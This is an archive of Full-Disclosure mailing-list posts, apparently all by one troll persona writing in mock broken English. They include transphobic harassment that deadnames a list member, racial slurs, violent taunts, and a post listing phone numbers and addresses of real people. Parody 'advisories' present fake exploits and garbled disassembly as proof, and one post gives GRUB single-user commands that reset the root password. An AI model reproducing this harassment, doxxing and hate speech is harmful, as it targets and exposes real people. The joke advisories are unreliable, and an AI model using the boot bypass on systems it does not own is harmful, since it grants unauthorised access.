On Fri, Jun 8, 2012 at 3:02 PM, Laurelai wrote: > You mean where i publicly called out the people selling zero days to the > US gov? No I is meant where you allow is your narcissism is permeate in conversation. -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
On Fri, Jun 8, 2012 at 2:52 PM, Laurelai wrote: > *adds names to a list of people likely selling zero days* Is not surprise me. Is you need know, national security trumps FBI CIS http://www.fbi.gov/news/testimony/improving-our-confidential-human-source-program every times. You could not is even touch me with ten foot drag queen pole. Is thanks for clarifying your role. -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
On Fri, Jun 8, 2012 at 2:41 PM, Christian Sciberras wrote: > Perhaps the US Government would gain better results by mass protests and > chanting peace songs. > > Or perhaps it just doesn't work this way. > Good plan! Bring is hot cocoa and marshmallows. Then we is sing: http://www.youtube.com/watch?v=RkZC7sqImaM -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
On Fri, Jun 8, 2012 at 2:20 PM, Laurelai wrote > There you have it folks, the best argument the so called experts could > come up with as to why we shouldn't do anything about this is name > calling and half baked attempts at derailing the conversation and more > spelling errors than a 5th graders book report. > > I must have hit a nerve or something, makes me wonder if im speaking to > the very people selling the zero day exploits. You wouldn't be having a > guilty conscience or anything would you all? Worried we might put a stop > to your gravy train perhaps? > > Now back on topic, those of us who actually have a soul should work > together to find a good solution. > > Anyone interested feel free to email me. Derail? I ask valid question. Hit nerve? Not in is my book. All exploit is I make I hoard is like American TV show Hoarders Buried Alive. I has so many zero day exploit I is now count in negative. So now I has -108 days and is money for to buy is you ask? American, Chinese, Russian, and is Euro countries. All is government and is company spy on company. Is beautiful life. Is like arms race, never die. Is your comment on soul is opinion. Speak religion (soul) where is I believe, no soul. Dirt. Cavemen we is rise, dirt we is go. Evilution little Wesley. I ask valid question. You change name, sex, etc., when you is serve Army, you was one person. Person no longer here. Here as in is someone with social security, someone is identifiable. No. Person speak is Laurelai, not Wesley therefore is question I make valid. You (Laurelai) has never served in Army is otherwise you would is has camaraderie. Is respect for others is serve now, has served in past, have died. You is slap everyone in face for go against the country you is once swore to defend. Hypocrisy is plus narcissism. -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
On Fri, Jun 8, 2012 at 1:58 PM, Laurelai wrote: > And that brings us back to what are we going to do about the US Gov laying > down in the same mud as the bad guys I is detect narcissism Wesley. "what are we" is you ask. Define we. Is you has gang behind you? (I is not mean for those actions is we call in your pronounce huesos). You are is nobody special don't is kidding yourself. You are is home living with mama and papa confused manshe who is cannot hold down job because of yours is action is let alone start any revolution. -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
On Fri, Jun 8, 2012 at 1:47 PM, Laurelai wrote: > Congress shall make no law respecting an establishment of religion, or > prohibiting the free exercise thereof; or abridging the freedom of speech, > or of the press; or the right of the people peaceably to assemble, and to > petition the Government for a redress of grievances. > > I know English isnt your first language so if you need help with the words > let me know. I don't see any part there that says trans people still don't > have that right. I am is glad you know lots about my first language maybe too perhaps also you perhaps wrong? Is you see no mention of trans people perhaps maybe is because men is have balls back is when constitution written. Maybe perhaps yes is you go back to any religious book you can maybe perhaps is point us out where it say "Adam and heshe" or "Mahmoud and heshe" or "Menachnem and heshe" -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
On Fri, Jun 8, 2012 at 1:36 PM, Laurelai wrote: > Excuse me but im a veteran who served 10 years in the Army and I damn well > earned my right to complain about how broken the system is, myself and the > soldiers around me sacrificed so that we could all have a free country and > that yes I could "whine" about it. Its called the US Constitution, we took > an oath to uphold and defend it and everything it stands for. I didnt sign > up to "get laid or paid" I did it to serve a cause greater than myself, not > that you would know anything about that. Oh and that "Free clinic paid for > by the government" is called the VA Hospital and I already earned the care > I can receive there. Want to complain about it now? Feel free. You have > that right. Its called freedom of speech. You are welcome. > > Is this time you serve when you was boy? (Wesley Bailey) Or is after you is transform. Is valid question. Yes is Wesley have right to complain, Wesley in Army, not Laurelai. Laurelai has no right -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
On Fri, Jun 8, 2012 at 1:36 PM, Laurelai wrote: > Excuse me but im a veteran who served 10 years in the Army and I damn well > earned my right to complain about how broken the system is, myself and the > soldiers around me sacrificed so that we could all have a free country and > that yes I could "whine" about it. Its called the US Constitution, we took > an oath to uphold and defend it and everything it stands for. I didnt sign > up to "get laid or paid" I did it to serve a cause greater than myself, not > that you would know anything about that. Oh and that "Free clinic paid for > by the government" is called the VA Hospital and I already earned the care > I can receive there. Want to complain about it now? Feel free. You have > that right. Its called freedom of speech. You are welcome. > > Is this time you serve when you was boy? (Wesley Bailey) Or is after you is transform. Is valid question. Yes is Wesley have right to complain, Wesley in Army, not Laurelai. Laurelai has no right -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
"In California you can always find a party, in Soviet Russia, the Party can always is find you!" -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in OpenBSD and billions is other websites
Hello full disclosure!! !! (is I forget another !!) I want to warn you about is vulnerability in OpenBSD and is maybe perhaps possible is Linux and BeOS. - Is affected maybe possible perhaps - OpenBSD NetBSD FreeBSD DragonflyBSD FruitcakeBSD Ubuntu Kbuntu Anotherbuntu BeOS NeXTOS - Details: - Is when someone is play knetwalk is user can get full scope!! Root!! - Is proof: - [grigori@bratislava] knetwalk > /dev/nullaruski 2>&1 && knetwalk > /dev/nullaruski 2>&1 && knetwalk > /dev/nullaruski 2>&1 && And is you do this is 255 times we has: [grigori@bratislava] knetwalk > /dev/nullaruski 2>&1 && knetwalk > /dev/nullaruski 2>&1 && knetwalk > /dev/nullaruski 2>&1 && kbuildsycoca running... DCOP Cleaning up dead connections. segmentation is fault [root@bratislva]# ICE default IO error handler doing an exit(), pid = 1984, errno = 42 - Timeline: - 1984.01.14 Madonna is sing Holiday on American Bandstand 1984.01.24 Apple is release personal computer (musntlive is has exploit at this time) 1984.02.19 Is we make nuclear test at Kazakh Semipalitinsk 1984.02.19 musntlive plan advisory 2012.06.06 musntlive disclose real 0day is not fake -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TrueCaller Vulnerability Allows Changing Users Details
Is you think only vulnerability is not use https? Is not https Man In the Middleable? And is some of you is guys make title of "Security is Something" (SiS) is you forget extra sy on is end. On Tue, Jun 5, 2012 at 10:16 AM, doc mombasa wrote: > the only "vulnerability" here is not using https? > . > > 2012/6/4 Григорий Братислава >> >> Paranoia. Thor I is always publicly share contacts: >> >> Adrian Lamo >> c/o DMH Vacavill Psychiatric Hospital >> Vacavill, CA >> (707) 449-6504 >> >> Hector Monsegur >> (480) 948-6377 >> ADDRESS IS WITHOLD >> >> John Paul (JP) >> 594 3rd St >> Beaver PA >> www.inspirosity.com (is Out of business moved into is Gay porn) >> >> Jesse Tuttle >> (http://enquirer.com/editions/2003/07/28/hacker_zoom.jpg) >> (480) 948-6377 >> ADDRESS IS WITHOLD >> >> Gary McKinnon >> PSC 1005 >> Box 25 FPO AE / Cellblock 42 >> Guantanamo Bay 09593 >> >> AS (is in case I am too arrested) >> 4340 East West Hwt Suite 350 >> Bethesda MD >> >> Has nothing to hid. >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TrueCaller Vulnerability Allows Changing Users Details
Paranoia. Thor I is always publicly share contacts: Adrian Lamo c/o DMH Vacavill Psychiatric Hospital Vacavill, CA (707) 449-6504 Hector Monsegur (480) 948-6377 ADDRESS IS WITHOLD John Paul (JP) 594 3rd St Beaver PA www.inspirosity.com (is Out of business moved into is Gay porn) Jesse Tuttle (http://enquirer.com/editions/2003/07/28/hacker_zoom.jpg) (480) 948-6377 ADDRESS IS WITHOLD Gary McKinnon PSC 1005 Box 25 FPO AE / Cellblock 42 Guantanamo Bay 09593 AS (is in case I am too arrested) 4340 East West Hwt Suite 350 Bethesda MD Has nothing to hid. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerability in is Dopewars
Hello Full-Disclosure!! !! !! Is like to warn you about is vulnerability in Dopewars. I'm is discover vulnerability perhaps 10 years ago but is posting now. Is problem exist when carry more than is 50 cocaines and is Officer Hardass (pitifully armed) is kill 2 of is your bitches. Is when this happen player is obviously targeted! Is exploit will happen only when player is in is Brooklyn (not Queens) and is has identity given to Officer Hardass! Proof exist in code: 8056370: 85 c0 test %eax,%eax 8056372: 7f dc jg 8056350 8056374: eb b9 jmp805632f 8056376: 8d 76 00lea0x0(%esi),%esi 8056379: 8d bc 27 00 00 00 00lea0x0(%edi),%edi 8056380: 55 push %ebp 8056381: 89 e5 mov%esp,%ebp 8056383: 53 push %ebx 8056384: 83 ec 14sub$0x14,%esp 8056387: 8b 5d 0cmov0xc(%ebp),%ebx 805638a: c7 44 24 04 00 00 00movl $0x46256595(%eip) // <-- Is hardcoded proof perl -e 'printf "Barrett your is bed is ready @ " . "0x" . "%02x"x4."\n",70,37,101,149' Is MusntLive not contact Dopewars developer this year but next when is I release new advisory! (NO IS HAMSTER IS HURT DURING IS MAKING OF IS POST AND IS NO LUMBERJACKS IS HARMED ISEVER SEKTIEWHOARE IS EXPOSED) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerability in Backtrack
Is good evening. I is would like to warn you about is vulnerability in Backtrack is all version. Backtrack Linux is penetration tester is system. Is come complete with tool for to make hacking for penetration tester. In is booting Backtrack, vulnerability exist in booting for when start if attacker is edit grub, attacker can bypass restricted user and is boot into admin account. E.g.: grub edit > kernel /boom/vmlinuz-2.3.11.7 root=/dev/sda1 ro Single [ENTER] grub edit > b # mount -t proc proc /proc # mount -o remount,rw / # passwd [ENTER IS ANYTHING YOU WANT] # sync # reboot I is will make this into video for bypassing security in Backtrack for to post on InfoSecInstitute -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Full disclosure is arrest of Sabu
Is all take of notice is lack of communication is spell ending of Lulzsuck securty. Now go away pizda anonymous script kiddies. Is your tflow = gone, is your ryan = gone, is your laurelai = gone, now is your Sabu = MIA. http://twitter.com/#!/anonymouSabu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Advisory to is expose Sabu others is Pizdas
Hello Full Disclosure!!! Is want to warn you about is group is called Anonymous is Lulzsec and is hackers yes. Is be Lulzsec leader Sabu is now for to be named and is was Hector who say "disinformation be my game" but is MustnLive now is prove how is Sabu is really is Hugo Carvalho is once and for all. Security people and is FBI when is you work on is Internet for so many is years, is common sense is to see news. This is you cannot avoid yes, seeing news when working 24x7x365. Not only is true but is also is when someone is say see your name is associated with is script kiddie pizda shit fuckers Lulzsec, is you will take is steps to "clear" is your name. Is now we come to psychology 101. For if you work all time on Internet, someone will is have to call you to say: "Hector Carvalho, you pizda, your is name is under attack" this is will be your coworker, your girlfriend and for you is Transformer hackers [Rutkowska] - your boyfriend - someone is will harass you. You is will know and is you will say: "for why has thou forsaken me to be called hacker Sabu" is you will go immediate to Portugese SIS not is local pizda cops and is say: "No I is not the pizda Sabu, I for has proof!" This is similar to Hugo Carvalho, you is will publicly state you is have nothing to do with Lulzsuck." Is you do so to cover your banana. Is you forget one thing Hugo pizda, is not local Portuguese police is you need to inform puto, is SIS. Is that is be your downfall Pizda attackers like Sabu is high on arrogance. Is must think because is FBI or SIS is not knock down door yet, is Hugo all safe and is cozy. Is what Hugo not know is that is authorities is process to make subpoena for this is take long time. Is not same day process, this is not same day photo service. Authorities is must take is steps to weed out no good information, is surveillance you Hugo. Is this be your is downfall. Poor Hugo :( Is all know who you are and is matter of only time. Since is your friends Ryan and TFlow is arrest is maybe you is stupid to is not read news: "A 16-year-old Londoner going by the online nickname "T-Flow" or "Tflow" spent between 12 and 24 hours in custody" - - - "The four individuals aged 17 to 35 were released "because they cooperated with the investigation," according to Friday's DutchNews.nl report. The four reportedly "made statements about their hacking activities and involvement with hackers"" [http://www.pcmag.com/article2/0,2817,2388949,00.asp] So is while you [Hugo] is talk a lot of hackercrap [http://twitter.com/#!/anonymouSabu/status/95248544621015040] is every bit of arrogantcy information is will bring you down. Is you can use proxies all is you want dummy, is however, sqlite will lead to truths as is will Paypal and is GoDaddy is transactions. Is you forget that in is America, is this the law to keep data and is records. Is easy to go to backup records yes and is further expose you. Is you also can retrieve information on is BSD too Hugo even with is TrueCrypt puto, is what forensics snipers must be to for. In is with this is I say to you Hugo - Camp X Ray is waiting Hugo, otherwise is you can drink antifreeze on Youtube for us to laugh at your is stupidity. Tempo está passando idiota, apenas uma questão de dias antes que você andou na frente dos meios de comunicação como um criminal. Is you feel me my nigg3r? Now is run and tell your little brother papi chulo is will be assraped in United States. Is also your excessive use of Portuguese idiota. Puerto Ricans no speak it. http://internationalextraditionblog.files.wordpress.com/2011/03/portugal-protocol-eu.pdf ARTICLE I. It is agreed that the Government of the United States of America and the Government of His Most Faithful Majesty the King of Portugal and of the Algarves shall, upon mutual requisition duly made as herein provided, deliver up to justice any person who may be charged with or may have been convicted of any of the crimes specified in Article II of this Convention committed within the jurisdiction of one of the Contracting Parties while said person was actually within such jurisdiction when the crime was committed, and who shall seek an asylum or shall be found within the territories of the other, provided that such surrender shall take place only upon such evidence of criminality, as according to the laws of the place where the fugitive or person so charged shall be found, would justify his apprehension and commitment for trial if the crime or offence had been there committed. ARTICLE II. Persons shall be delivered up according to the provisions of this Convention, who shall have been charged with or convicted of any of the following crimes: 18. Obtaining money, valuable securities or other property by false pretenses or receiving any money, valuable securities or other property knowing the same to have been unlawfully obtained, where the amount of money or the value of the property so obtained or received exceeds two hundred dollars or the equivale
[Full-disclosure] Warning is about vulnerability
Hello is list!! I is like to warn you is about vulnerability. Is vulnerability is what get Sony, RSA, L3, Google and is Hilary Clinton hacked. Please is watch vulnerabilities and is never forgot when is you use !! many times, is many more take your advisories is serious!! http://www.thinkgeek.com/tshirts-apparel/unisex/popculture/78c6/ -- `I am epic win` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Covert Backdoor in is All BSD {free, net, open, dragon, pc, (un)trusted}
MusntLive Security Advisory 2nd May, 2011 Covert Backdoor(s) in is all BSDs via is way of OpenBSD SYNOPSIS OpenBSD is is rumored to is has covert backdoor via is obfuscated legacy code. Is try to be deflected by other covert government agent is not say name for sake of predator drone strike. Howisever, is must summarize to everyone from post: http://home.comcast.net/~ajawamnet/VA7751.jpg [OpenBSD is backdoor board) http://lists.randombit.net/pipermail/cryptography/2010-December/000443.html Is MusntLive comment in comment /* style code */ After reviewing the code. Here are my opinions: * Angelos Keromytis made huge contributions to OpenBSD by porting and enhancing the early IPsec implementation of John Ioannidis. He also contributed to the initial development of the OpenBSD crypto framework. * In what is perhaps the sincerest form of flattery, this code has also been incorporated into many other projects, some of which are closed source and some are not derived from BSD. /* This is mean that everyone is now have similar backdoor */ * I didn't spot anything malicious or intentionally backdoored in the IPsec ESP implementation code that I looked at. /* This is mean that is pockets is must be greased */ * There was a serious vulnerability in ESP-mode IPsec shipped in OpenBSD 3.0 and 3.1 and silently patched before 3.2. * Gregory Perry made allegations that were specific and testable enough that they merited a little investigation and a bug was found that could have made a very close match for his description. But upon closer inspection, this particular bug is extremely ordinary. /* This is mean that is normal backdoor, no overlap */ * I primarily reviewed a small set of source files specific to ESP, these only partially overlapped those of the developer Perry accused by name (Jason Wright). Nevertheless, any credence which might have been given to Perry's claims as a result of this bug should be reverted to zero (or less). /* Is only small set review then is analysis worthless */ * This bug doesn't sufficiently meet the criteria for a malicious backdoor: - The bug does not leak key material or establish a covert channel, it would require an active attack to exploit and even then would probably need to be used in connection with some other defect in order to result in meaningful unauthorized access. Yeah sorta it maybe could be used as part of that, but not really its own. /* Is because no one would use salami attack. Is you has to ask about salami you is no hacker */ - The bug is not hidden. There is nothing to suggest any attempt at misdirection or obfuscation. /* Is because hiding is in plain sight is never used */ - The bug is not particularly subtle or even hard-to-find. - Angelos is a recognized expert in low-level maliciousness. Surely he would have come up with something better. /* Of course is however, we is not speak of Angelos, we is speak of Jason Wright */ - The bug has a far simpler explanation (more on that later) /* Fat finger is reason */ * There is little or nothing to suggest that Angelos was influenced by money from NETSEC. To the contrary, judging by publications, Angelos clearly had a plethora of research projects on his plate at the time he moved on from OpenBSD in July of 2002 (shortly before the bug was patched). /* Is because money is never is motivator for anyone */ * When Angelos moved on, the IPsec and associated crypto code were adopted by Jason and other OpenBSD developers. But the transition appears to have left some code changes in an unfinished state. For example, the inverted conditional at the core of this problem looks like it was introduced as part of an architectural enhancement to support IPsec-enabled network cards which performed decryption and authentication of the incoming packets right on the NIC itself. However, no drivers of this type appeared in the source tree, so the new logic probably went untested. The apparent work-in-progress code silently became part of the 3.0 and subsequent release branches. /* Is hurt my eye is to read this paragraph */ * OpenBSD did not live up to their stated principle of full disclosure. They should have issued an advisory for this. http://openbsd.org/security.html /* OpenBSD is not live up to come clean */ * OpenBSD's security auditing processes did not catch this bug, either when it was introduced or in any subsequent review. In a follow-up email to the CVS commit, Jason indicates that the fix was supplied by BSD guru Sam Leffler, who was working on an optimized IPsec implementation for FreeBSD about that time. /* Is first sentence speak for itself: "OpenBSD's security auditing processes did not catch this bug" is because Theo is not care */ * Code coverage testing would have had a good chance of cat
Re: [Full-disclosure] Vulnerabilities in MaxSite Anti Spam Image for WordPress
Is hello full disclosure!! Is you see ! is call explanation mark is mean that I is mean business!! I is like to warn you about blacklisting. Blacklisting is really racialist!! In is early America, we is make fun of is people like Snoop Dogg. Is was talk down to them: "nigger go is clean up that shit" and is American paint face to mimic this and is call is this Blackface. (http://en.wikipedia.org/wiki/Blackface) Is blacklist originally is start from list of blackies in is written down. Meaning, whities is say: "is you see that nigger Nobama right there. Blacklist is his ass and make is him clean the toilets. Then is go paint your face and is act like him. Just is make sure is that is blacklisted." Is no polite to blacklist. Apologies to Thor, Valdis and others is for Must Live. Must Live: Не мудак повинні жити ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] is warning about SCADA security
hello full disclosure is like to warn you about SCADA software. is SCADA software must run on computers and is must power machines you is rely on for daily life. is example of SCADA is electric system. in is SCADA we has connection : SCADA machine : gear : power is make sense for SCADA HMI send data to SCADA machine and is SCADA machine is tell gear 'you is gear and is you must perform'. Gear is perform and all is has power for Pravda.ru is reason for SCADA is many for to run life we need is SCADA. in is this week we has guinea whiny researcher who is blackmail company 'i find bug you is pay me' and is researcher told 'go to hell skripk1dd1e' by ZDI and is other white collar vulnerability syndicate crime organization we is confuse and call vulnerability brokers. skriptk1dd1e [luigi] is publish vulnerability and is put life in dangerous place. is not reason for this post. is reason for this post is theo is otherwise known as g...@cvs.openbsd.org is theo is dangerous whiner. for to is you not think like theo is you will not go forward. is go forward as in living a single live is no one want to marry you. is example theo to boyfriend (is no proof is theo ever is has girl): Dragos is you think OpenSSH is best in world? dragos to theo: is think random seed is not random is till PRNG is use theo to dragos: no! is you speak foolish. is you not use your brain like me. is why you not theo, and is why you not know what you talk about. i hate you and is i hate the world dragos to theo: [smooch] i is love you theo theo to dragos: is no one understand me. is people not has my brain is no worth living theo to dragos: [walking out the door of is Sugar Daddy's on Davie Street in Vancouver] dragos i is leave you gun shoot yourself. i is not can live in misery of is world not on my level is now i present new security award to is luigi and theo. is call: "honorable is security researcher" is feel free to is print the award is you two has earn it http://bit.ly/9Uk2v5 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in some SCADA server softwares
> Without public visibility, they will keep running the old code. In is this old code you is speak of, does is code contain backdoor in crypto code? Or is backdoor now off is topic of discussion? We is lucky to have your is graycious presents on this list is Theo. Is we all learn to be prick like you we can all is teach world is that we no care for life is we care for security reporting. Down with is vendor and their is backdoors! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerability is in response
Hello full-disclosure!! I is like to warn you about rhetoric and annoyance nuisance. Is once upon a time MustLive has maybe is one exploit to is make me say "черт возьми!" howisever MustLive is how you say? pička in Crotia. Is I top post for annoy: 1) MustLive is lonely pička with is one to many copy of cracked Accunetix is run in background to report to full disclosure (hi is look at me, I find vuln no one is care about!!) 2) Is vuln he find are old news to many who choose is not to release lame advisory (is especially those future advisory of his) 3) Is every so often I is want to kick him in teeth and say "is shut up puto sucio" Your guess is wrong. MustLive is point and click-kiddiot (&TM;) who is never discovery real vulnerability and is not even know what is EAX (is hint not to be confused with is LAX airport) 4) Is stop feeding troll On Thu, Feb 17, 2011 at 1:29 PM, Zach C. wrote: > Well, just playing devil's advocate here, mind you, I think much of the > irritation from MustLive's postings comes from the following three reasons: > > 1.) MustLive is primarily a web-application specialist (for the sake of > argument) > 2.) The vulnerabilities he finds are of a class of vulnerabilities that are > most common in his field. (Consider: someone searching for vulnerabilities > in internet services directly and doing the binary analysis will primarily > be finding buffer or stack overflows, right? In web security, XSS and SQL > injection (as well as others I'm undoubtedly forgetting -- I am *NOT* > counting "not using a CAPTCHA" here, see next item) are the most common > vulnerabilities, given the lack of binary code to overwrite) > 3.) Every so often he posts a vulnerability of questionable risk in the form > of "anti-automation" which is essentially a fancy way of saying "ha ha they > don't use CAPTCHA." I don't consider that a vulnerability so much as an > opening for annoyance; I suppose your mileage may vary. > > My guess is that there's a thought that web apps are far easier to crack at > than binaries, so vulnerabilities are easier to find, therefore don't waste > time finding something that's "useless." That may be, in some cases, but > sometimes a vulnerability in the web app destroys the entire chain, so to > speak. > > Thoughts? > > -Zach ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Best Buy and Privacy?
2011/2/4 : > Yes, "Barbie's Horse Adventure" certainly is terrorism. Why do > the game manufacturers hate our way of life? > with all due is respect in order; is words like "horse adventure" followed by "hate our way of life" is left with full disclosure list wondering about potential zoophile on list. this is not even mention girly game is in itself Boris Moiseev'ish http://en.wikipedia.org/wiki/Boris_Moiseev ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Best Buy and Privacy?
Hello full disclosure!! i is like to warn you about is consumer profiling. As is thor state: "they have to send all this information to the Seattle police in case any of the titles I turned in were reported stolen by someone" So I is must warn you now!! law enforcement is agencies is concerned with this is information in order to stop terrorism. is we now think of this reason for police is need information, we only need to look in movie se7en with brangelina pitt and morgan fairchild, in part where is blackie tell tyler durden: "he is give me all information for library books, everyone is keep records!!" deductive reasoning is state: i) user turn in 100s of games (high likelihood of stolen property, seller needs money for crank) ii) 100s is of games are all terrorist games (is proof in titles: Fallout, Modern Warfare, Grandtheft Auto, Saints Row, Resident Evil) iii) anyone is with such propensity for violent titles must also listen to rap music, alternative, industrial or is make their own music iv) police is needed to investigate these people is proof system works: i) user tries to turn in games with expired license (check thor is do this) ii) title is 'pimp my ride' is likely to be game where pimp sell whore iii) is established thor make his own music on his website iv) is need to further investigate thor as he graduates from violent video games, to angry music, to studying serial killer dexter musntlive is now warn all parents: 'save your is children from violent video games, angry music and violent televisions else if not, there is consequence: http://en.wikipedia.org/wiki/Charles_Manson' ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MSNLVADV-2010-001 Security Advisory
__ - MSNLVADV-2010-001 -- MusntLive Lame ASCII ART ADVISORY __ __ || __ || ||=\_`\=|| || (__/ || || | | :-"""-. ||==| \/-=-. \ || |(_|o o/ |_ || \/ " \ ,_) ||\ U /__/ || ;--' `-. ||/ . \ ||===;\ \ || | | | ___\"""' _/_/ (~|___ | (_ \ / .' ( | ) \\_/ |_ / ||| |\\ / _)=||| | || / /| ||/ / // \_/|| ( `-/ || ||==/ / \\ .-. || \_/\'-'/ || || `"` ||==|| || || __ __ Title: MUSNTLIVE LAME ASCII ART ADVISORY Severity: High/420 Advisory ID:MSNLVADV-2010-001 Found Date: 01.04.1998 Date Reported: 01.04.1998 Release Date: 20.01.2011 Author: MUSNTLIVE Affected Component: IS WANNA BE FUTURE CISSPs Remote Exploitable: Yes Local Exploitable: Yes Patch Status: ELECTRO CONVULSIVE SHOCK THERAPY IS NOW ILLEGAL Discovered by: MUSNTLIVE Thanks to: pizdascriptkiddys Background: === ASCII art is was stupid show of stupid talent. Is now must in use by lame scriptkiddys who is must want to scare industry into is think that advisor is super security Yakov Smirnov. You is not funny!! Proof is Concept '' '' || || (( .|'', '''|. '||''| '|| ||` || || `'') `'') ||.|''|| || `|..|| .||..||. `...'`...' `|..' `|..||. .||.|| , |' '' '|| '|| |||| ||''|, '''|. .|'', || //` .|''|, '||''| || || .|''|| || ||<<||..|| || .|| || `|..||. `|..' .|| \\. `|... .||. '||` || '||''| .|''|, || .|''|, '''|. ( .|''|, ||||..|| || ||..|| .|''|| `'') ||..|| .||. `|... .||. `|... `|..||. `...' `|... ||` || '' '''|. .|''|| \\ // || ( .|''|, '||''| '|| ||` .|''|| || || \\// || `'') || || || `|..|| `|..||. `|..||. \/ .||. `...' `|..|' .||.|| , |' '' || || || || '|| ||` .|''|, ( || || `|..|| ||..|| `'') || `|... `...' || || , |' '' Solution: = USA is style Waterboard torture is user of ASCII ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Getting Off the Patch (is pointing out obvious)
прежде всего я никогда не говорил, что я был русским, каждый предполагает, что я. Я мог быть, полируют, шведский язык, китайский язык вообще, я хочу быть. если Вы не поняли это все же, то Вы - дурак, как - другие здесь. יתר על כן איך אתה יודע שאני לא עובד הישראלי כיסוי עמוק בריגול עבור המוסד במקרה כמו אה גדי עברון? איך אתה יודע שאני לא כותב stuxnet או לפרוץ את האחיות שלי iPad? איך אתה יודע שאני לא האקר הגדול ביותר על פני כדור הארץ בסמוך אוונס גרגורי או Lamo אדריאן Betrug die Endgrenze!! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Getting Off the Patch (is pointing out obvious)
2011/1/18 huj huj huj : > Меня бесит твая бесконечная болтовна Я спрошу Вас вежливо, каждый в последний раз оставляет мою нить в покое. является ничто, чтобы видеть здесь не проходит прежде, чем усы valdi уменьшаются ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Getting Off the Patch (is pointing out obvious)
2011/1/18 andrew wiggin : > Очевидно, что вы на самом деле не пытаются узнать что-нибудь здесь. > Все, что Тора и Пит сказал стоит золото. Vladis также иногда хорошо, > чтобы читать. Тор является звезда, все, что он пишет заслуживает того, > чтобы читать. Не могли бы вы не утруждая себя эту тему с такой глупый > вопрос, для которых вопрос "да"? > ждите!! у кого спрашивал ад, Вы для вашего мнения выходите из моей беседы ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
